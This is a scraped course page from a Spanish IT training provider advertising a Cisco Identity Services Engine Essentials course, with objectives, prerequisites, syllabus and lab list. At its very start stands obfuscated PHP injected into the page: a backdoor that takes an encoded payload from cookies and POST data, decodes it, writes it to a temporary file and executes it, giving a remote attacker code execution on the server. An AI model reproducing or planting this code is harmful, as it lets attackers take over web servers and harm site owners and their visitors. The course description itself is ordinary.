$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Cisco Identity Services Engine Essentials|Grupo Loyal

Cisco Identity Services Engine Essentials

In this course, you will learn about the Cisco Identity Services Engine (ISE) a next-generation identity and access control policy platform that provides a single policy plane across the entire organization combining multiple services, including authentication, authorization, and accounting (AAA) using 802.1x and MAB. The training provides learners with the knowledge and skills to implement 802.1X and MAB for wired and wireless endpoints. The class focuses on configuring Network Access Devices (IOS switches, and Wireless Lan Controllers) with commands necessary for ISE integration. The class also covers configuration of endpoints to use the native Microsoft supplicant with PEAP and EAP-TLS, as well as the Cisco NAM supplicant with EAP-FAST. Time is taken to explore Microsoft Active Directory group policy for endpoint configuration, and to cover integration of an enterprise CA for certificate based authentication.

This course is an intensive hands-on experience. With enhanced hands-on labs, you will setup and patch an ISE node, and use and enterprise CA to configure certificate services for use in a distributed deployment. You will integrate ISE with Active Directory and configure Group Policy to automatically enroll endpoints with an enterprise CA for TLS based authentication. You will configure and test AAA and 802.1X on an IOS switch using classical commands to integrate with ISE. You will migrate and test an IOS switch configuration to use the new-mode IBNS 2.0 Cisco Common Classification Policy Language (C3PL). You will configure and test a Cisco Wireless LAN Controller (WLC) with advanced ISE features. The class also covers the new ISE 2.3 conditions studio and its use in Policy Sets for Authentication/Authorization rules, Profiling of endpoints on the network, and Device Administration using TACACS+.

Objetivos

After completing this course you should be able to:

Implement Best Practices for Designing and Deploying a Distributed Cisco ISE Solution
Install certificates into ISE using a Windows 2012 Certificate Authority (CA)
Configure the Local and Active Directory Based Identity Store and use of Identity Source Sequences
Implement Best Practices for configuring a Cisco IOS Switch for use with ISE
Migrate an existing Cisco IOS Switch configuration to New-Mode Cisco Common Classification Policy Language (C3PL)
Implement Best Practices for configuring a Cisco Wireless LAN Controller (WLC) for use with ISE
Configure Policy Sets and Network Access Devices in ISE
Implement & Test 802.1X in ISE for wired PEAP, EAP-FAST & EAP-TLS Supplicants
Implement & Test 802.1X in ISE for wireless EAP-FAST & EAP-TLS Supplicants
Implement & Test MAC Authentication Bypass (MAB) in ISE for wired and wireless endpoints
Turn on Endpoint Profiling and use it to identify popular endpoints such as Windows and Apple iOS devices.
Implement TACACS+ for Switch and WLC Device Administration

Ciberseguridad

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Descargar la información del curso

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
15 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

Consulting systems engineers; Technical solutions architects; Integrators who install and implement the Cisco ISE version 2.3; End users (Cisco customers) desiring the knowledge to install, configure, and deploy Cisco ISE 2.3. Cisco channel partners and field engineers who need to meet the educational requirements to attain Authorized Technology Partner (ATP) authorization to sell and support the ISE product

Conocimientos requeridos

Attendees should meet the following prerequisites:

CCNA Security or equivalent level of experience with Cisco devices (ICND1 +IINS)
Foundation-level wireless knowledge and skills
Familiarity with Microsoft Windows and Microsoft Active Directory
Familiarity with 802.1X
Familiarity with Cisco ASA
Familiarity with Cisco AnyConnect Secure Mobility Client

Temario

Cisco ISE Architecture and Deployment

Cisco ISE Features Overview
PKI in an ISE deployment
Cisco ISE Deployment Models
Cisco ISE Identity Management

Configuring Cisco ISE Internal Identity Sources
Configuring Cisco ISE External Identity Sources
Configuring Endpoints for Certificate Based Authentication
Cisco ISE Policy Enforcement

Registering Network Access Devices in Cisco ISE
Working with ISE Dictionaries
Configuring Cisco ISE Policy Sets
Using the Cisco ISE Conditions Studio to Configure Policy Elements
Creating Downloadable ACLs and Authorization Profiles
Configuring Authentication Policy Rules including Identity Source and Allowed Protocols
Configuring Authorization Policy Rules including conditions and authorization profiles
Introducing Wired and Wireless 802.1X and MAB

Overview of 802.1X Including Commonly implemented Extensible Authentication Protocols (EAPs)
Configuring a Cisco IOS Switch using Identity-Based Network Services (IBNS) commands for integration with ISE including
Configure and Test 802.1x supplicant parameters on a wired endpoint using PEAP and EAP-TLS
Migrating to IBNS 2.0 Cisco Common Classification Policy Language (C3PL) commands on a Cisco Switch
Configure and Test 802.1x supplicant parameters on a wired endpoint using EAP-FAST
Configuring a Cisco WLC for integration with ISE from the WLC CLI and GUI
Configure and Test 802.1x supplicant parameters on a wireless endpoint using EAP-FAST and EAP-TLS
Implement and Test MAC Authentication Bypass in ISE for non-supplicant Endpoints
Cisco ISE Profiler for Endpoint Discovery and Classification

Configuring Profiler Probes
Working with the Profiler Feed Service
Implementing Profiler Policy and Identity Groups
Using Profiler Logical Profiles
Cisco ISE TACACS+ for wired and wireless Device Administration

Configuring TACACS Policy Sets
Working with Identity Sources for Authentication
Configuring Shell Profiles and Command Sets for Authorization
Performing Wired and Wireless Device Administration
Labs:

Lab 1: Setup an ISE Node and Configure Certificates
Lab 2: Register an ISE Node in a Distributed Deployment
Lab 3: Integrate ISE with Active Directory
Lab 4: Configure Endpoints for Certificate Based Authentication
Lab 5: Register NADs and Configure ISE Policy
Lab 6: Configure an IOS Switch and Test Wired PEAP and EAP-TLS
Lab 7: Migrate a Switch to IBNS 2.0 (C3PL) and Test Wired EAP-FAST
Lab 8: Configure a WLC and Test Wireless EAP-FAST
Lab 9: Implement MAC Authentication Bypass (MAB)
Lab 10: Configure and Test Endpoint Profiling
Lab 11: Implement TACACS+ for Switches and WLCs

Solicita información del curso

It Formacion

It Formacion